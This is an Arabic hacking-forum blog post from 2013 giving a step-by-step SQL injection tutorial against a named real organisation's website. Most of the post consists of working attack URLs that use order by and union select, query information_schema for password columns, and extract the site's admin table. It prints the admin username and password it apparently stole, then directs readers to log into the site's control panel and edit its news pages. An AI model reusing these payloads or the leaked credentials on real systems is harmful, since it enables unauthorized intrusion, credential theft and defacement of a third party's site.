حاسوبي اختراق مواقع مصابة بثغرة sql injection ~ قراصنة الجزائر
لا تنسو صلاتكم ان الصلات كانت على الموؤمنين كتابا موقوتا

الأربعاء، 10 أبريل 2013

اختراق مواقع مصابة بثغرة sql injection

السلام عليكم معكم اخوكم simo sol اليوم باذن الله سأتطرق لكيفية اختراق مواقع مصابة بثغرة sql injection أو حقن تعليمات الاستعلام البنيوية (SQL) بإضافات. الهدف هو إستغلال أي ثغرة أمنية موجودة بطبقة قاعدة وهنا في الاسفل سترون التطبيق على الموقع وانشاء الله في درسنا القادم سنتطرق لكيفية البحث على هذه المواقع وعلى البرنآمج الذي نستعمله وكيفية التخفي عند عملية الاختراق 
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=2 
ح الاستغلال كدا
كود PHP:
 http://www.cssanyu.org/news/showevent.php?id=2' 

حلو جدا انا  اعرف عدد الجداول الموجوده وش اسوي

راح نستخدم امر

order+by

 يكون هكذا الاستغلال
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+order+by+6-- 
كدا حلو ما ظهر لنا خطأ

يبقي عدد 6 في الجداول موجود


طيب الحين نزود عدد 6 الى 7 و 8 لحد ما يظهر لنا الخطأ

طيب الحين نزود عدد ليصبح عدد الجداول 7
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+order+by+7-- 
ظهر لنا الخطأ


وكدا نعلم ان عدد الجداول المصابه في الموقع هم 6 لان الموقع اشتغل عند هذا العدد

الحين نستخدم امر union+select لكي نظهر الجداول المصابه بالموقع

ونضع عدد الجداول الى هم + وراح يصبح الاستغلال كدا
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6-- 
يجب ان

لا ننس ان نضع علامه - قبل الرقم المتغير الى هوه رقم 2


حلو الحين عندنا الجدول رقم 3 ورقم 4 مصابين كما بالصوره

الحين نشوف اصدار القاعده

نضع امر version() في العمود المصاب

هذا استغلال بسيط
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,version(),5,6-- 
حلو

الحين جدا ظهر لنا الاصدار الخامس 


احسن شيئ في الاصدار الخامس ممكن تطلع اسماء الجداول من غير ما تخمن وهذي الميزه حلوه جدا

حلو الحين راح نستخدم امر الاستعلام هذا
كود PHP:
+from+information_schema.columns+WHERE+column_nam e+LIKE
امسح المسافات من كلمه نيم
بعد كلمه Like راح نضيف تشفير الى بدينا نبحث عنه داخل قواعد البينات

وراح ارفق لكم بعض التشفيرات

وراح نضع في العمود المصاب

هذا الاستعلام

concat(table_nam e,0x3e,column_nam e,0x3e,table_schema)

امسح المسافات من كلمه نيم

الحين بيصبح الاستغلال

كدا
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,concat(table_nam e,0x3e,column_nam e,0x3e,table_schema),5,6+from+information_schema.columns+WHERE+column_nam e+LIKE+char(37, 112, 97, 115, 115, 37)-- 
امسح المسافات من كلمه نيم
طبعا التشفير الموجود بعد كلمه Like هوه لكلمه %pass%

وهذي العلامه % تعني ان ممكن يكون اسمه قبل pass او بعده

والتشفير
كود PHP:
char(371129711511537
هوه الى راح نغيرو للبحث بأسماء

اخري مثل %user% و %login% و %admin% تم وضع مرفقات مع الدرس

وهكذا بعد ما كتبنا الاستغلال نشوف وش النتيجه


حلو تم استخراج البينات المطلوبه

admin>password>nyucssamember

admin : اسم الجدول

Password : ام العمود

الحين نروح نستخدم البينات الى احنا طلعناها علشان نجيب اسم اليوزر حقت الادمن والباسورد

رجع لاظهاء الجداول المصابه مره اخري
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6-- 
الحين نستخدم امر

+from+اسم الجدول --

وفي العمود المصاب نضع password الى استخرجناها

والجدول طبعأ بيكون admin

يعني يصبح هكذا
كود PHP:
http://www.cssanyu.org/news/showevent.php?id=-2+union+select+1,2,password,4,5,6+From+admin-- 
جيد

جدا الان الاتغلال ظهر لنا الباسورد الى احنا طلبناه حق الادمن


والباسورد هوه spc1234

طيب الحين نجرب نفس الاستغلال ونبدأ password بـ usernam eعلشان نطلع يوزر

الادمن
اليوزر هوه spc

طيب الحين كل شيئ تمام الان نروح للوحه الموقع وانت الى عليك تخمنها

احيانا بتكون

admin.php

login.php

control.php

ومسار اللوحه
كود PHP:
http://www.cssanyu.org/news/login.php? 
الحين معنا اليوزر والباس ندخلهم

ونضغط login

طيب حلو اكيد كل موقع واللوحه حقو تختلف عن الاخري

الان نذهب للاخبار = news

ونضغط Edit
ولان ندخل ونجرب على الموقع المستهذف



اتمنى ان ينال الدرس اعجابكم

0 التعليقات:

إرسال تعليق